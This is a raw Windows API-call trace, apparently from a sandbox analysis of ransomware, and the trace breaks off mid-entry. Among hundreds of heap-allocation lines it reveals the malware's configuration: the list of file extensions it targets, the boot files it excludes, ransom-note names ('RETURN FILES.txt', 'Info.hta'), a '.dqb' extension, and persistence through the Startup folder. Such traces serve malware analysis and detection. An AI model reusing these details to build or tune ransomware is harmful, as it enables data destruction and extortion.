0x6616f8 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661710 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661728 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661740 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661758 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x661770 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661788 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6617a0 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6617b8 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6617d0 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6617e8 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661800 [0264.628] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661818 [0264.628] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x673d48, Size=0x400) returned 0x661918 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661830 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661848 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x661860 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661878 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x661890 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6618a8 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6618c0 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6618d8 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6618f0 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632d38 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661fe8 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632d50 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x632d68 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632d80 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632d98 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632db0 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632dc8 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x632de0 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632df8 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632e10 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632e28 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632e40 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632e58 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632e70 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632e88 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632ea0 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x661ff8 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632eb8 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632ed0 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632ee8 [0264.629] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632f00 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632f18 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632f30 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632f48 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632f60 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632f78 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x632f90 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632fa8 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x632fc0 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632fd8 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x632ff0 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633008 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633020 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633038 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x633050 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633068 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633080 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633098 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6330b0 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6330c8 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6330e0 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6330f8 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633138 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633150 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633168 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633180 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633198 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6331b0 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6331c8 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6331e0 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6331f8 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633210 [0264.630] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x633228 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x61a178 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633240 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633258 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633270 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633288 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6332a0 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6332b8 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6332d0 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6332e8 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633300 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633318 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633330 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633348 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633360 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633378 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633390 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6333a8 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6333c0 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6333d8 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6333f0 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633408 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x633420 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x633438 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x633450 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x633468 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x633480 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x662008 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633498 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x662018 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6334b0 [0264.631] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6334c8 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6334e0 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6334f8 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x633538 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633550 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x633568 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633580 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633598 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6335b0 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6335c8 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6335e0 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6335f8 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633610 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x662028 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633628 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633640 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633658 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633670 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x633688 [0264.632] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6336a0 [0264.632] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661918, Size=0x800) returned 0x633920 [0264.632] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0264.632] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x672d40 | out: hHeap=0x5e0000) returned 1 [0264.632] lstrlenW (lpString="") returned 0 [0264.632] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6347b8 | out: hHeap=0x5e0000) returned 1 [0264.632] lstrlenW (lpString=".dqb") returned 4 [0264.633] lstrlenW (lpString=".dqb") returned 4 [0264.633] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6347b8 | out: hHeap=0x5e0000) returned 1 [0264.633] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6347e8, Size=0x20) returned 0x619ab0 [0264.633] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619ab0, Size=0x40) returned 0x61ac00 [0264.633] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ac00, Size=0x80) returned 0x65ed30 [0264.633] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x662098, Size=0x8) returned 0x6620a8 [0264.633] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6620a8, Size=0x10) returned 0x6347e8 [0264.633] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6347e8, Size=0x20) returned 0x619b00 [0264.633] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0264.633] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65ed30 | out: hHeap=0x5e0000) returned 1 [0264.633] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634818, Size=0x20) returned 0x619b28 [0264.633] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619b28, Size=0x40) returned 0x61ac00 [0264.633] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0264.633] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0264.633] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61ac00 | out: hHeap=0x5e0000) returned 1 [0264.633] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634818, Size=0x20) returned 0x619b28 [0264.633] lstrlenW (lpString="Info.hta") returned 8 [0264.633] lstrlenW (lpString="Info.hta") returned 8 [0264.633] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619b28 | out: hHeap=0x5e0000) returned 1 [0264.634] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x672d40, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe")) returned 0x47 [0264.634] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x672d40 | out: hHeap=0x5e0000) returned 1 [0264.634] lstrlenW (lpString="ivttvf.exe") returned 10 [0264.634] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619b00, Size=0x40) returned 0x61ac00 [0264.634] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634818, Size=0x20) returned 0x619b00 [0264.634] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634818, Size=0x20) returned 0x619b28 [0264.634] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619b28, Size=0x40) returned 0x61ac48 [0264.634] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ac48, Size=0x80) returned 0x65ed30 [0264.634] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65ed30, Size=0x100) returned 0x630d38 [0264.634] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0264.634] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x630d38 | out: hHeap=0x5e0000) returned 1 [0264.634] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x672d40, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0264.634] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x682d48 | out: hHeap=0x5e0000) returned 1 [0264.634] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x672d40 | out: hHeap=0x5e0000) returned 1 [0264.634] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6620a8, Size=0x8) returned 0x662098 [0264.634] lstrlenW (lpString="%windir%;") returned 9 [0264.635] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619b00 | out: hHeap=0x5e0000) returned 1 [0264.635] lstrlenW (lpString="C:\\Windows;") returned 11 [0264.635] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x640528 | out: hHeap=0x5e0000) returned 1 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634830, Size=0x20) returned 0x619b00 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619b00, Size=0x40) returned 0x61ac48 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ac48, Size=0x80) returned 0x65ed30 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65ed30, Size=0x100) returned 0x630d38 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6620d8, Size=0x8) returned 0x6620e8 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6620e8, Size=0x10) returned 0x634878 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634878, Size=0x20) returned 0x619b00 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6620a8, Size=0x8) returned 0x6620e8 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6620b8, Size=0x8) returned 0x6620a8 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6620d8, Size=0x8) returned 0x6620f8 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6620f8, Size=0x10) returned 0x634940 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634940, Size=0x20) returned 0x619b28 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6620e8, Size=0x10) returned 0x634940 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6620a8, Size=0x10) returned 0x634970 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6620e8, Size=0x8) returned 0x6620d8 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x662108, Size=0x8) returned 0x661930 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634940, Size=0x20) returned 0x619b50 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634970, Size=0x20) returned 0x619b78 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661940, Size=0x8) returned 0x661950 [0264.635] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0264.635] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x630d38 | out: hHeap=0x5e0000) returned 1 [0264.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6349e8, Size=0x20) returned 0x619bc8 [0264.636] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x640528, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0264.636] lstrlenW (lpString="C:\\") returned 3 [0264.636] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0264.636] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x640528 | out: hHeap=0x5e0000) returned 1 [0264.636] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661980, Size=0x82) returned 0x61db00 [0264.636] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6619a0, Size=0x100) returned 0x630d38 [0264.636] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61db00, Size=0x104) returned 0x6351b8 [0264.636] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x630d38, Size=0x200) returned 0x6352e0 [0264.637] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x661990 | out: hHeap=0x5e0000) returned 1 [0264.637] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6352e0 | out: hHeap=0x5e0000) returned 1 [0264.637] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x634a90 | out: hHeap=0x5e0000) returned 1 [0264.637] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65ef50 | out: hHeap=0x5e0000) returned 1 [0264.637] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x634a48 | out: hHeap=0x5e0000) returned 1 [0264.637] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65eec8 | out: hHeap=0x5e0000) returned 1 [0264.637] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x634a78 | out: hHeap=0x5e0000) returned 1 [0264.637] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6351b8 | out: hHeap=0x5e0000) returned 1 [0264.637] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x634a60 | out: hHeap=0x5e0000) returned 1 [0264.637] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61db90 | out: hHeap=0x5e0000) returned 1 [0264.637] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x634aa8 | out: hHeap=0x5e0000) returned 1 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x635128 | out: hHeap=0x5e0000) returned 1 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x634ac0 | out: hHeap=0x5e0000) returned 1 [0264.638] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634ac0, Size=0x20) returned 0x619bf0 [0264.638] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619bf0, Size=0x40) returned 0x61ac48 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x661960 | out: hHeap=0x5e0000) returned 1 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6349e8 | out: hHeap=0x5e0000) returned 1 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61da70 | out: hHeap=0x5e0000) returned 1 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x634a18 | out: hHeap=0x5e0000) returned 1 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65ee40 | out: hHeap=0x5e0000) returned 1 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x634a00 | out: hHeap=0x5e0000) returned 1 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x661970 | out: hHeap=0x5e0000) returned 1 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x634a30 | out: hHeap=0x5e0000) returned 1 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61da40 | out: hHeap=0x5e0000) returned 1 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x61a278 | out: hHeap=0x5e0000) returned 1 [0264.638] lstrlenW (lpString="%systemdrive%") returned 13 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x619bc8 | out: hHeap=0x5e0000) returned 1 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65ed30 | out: 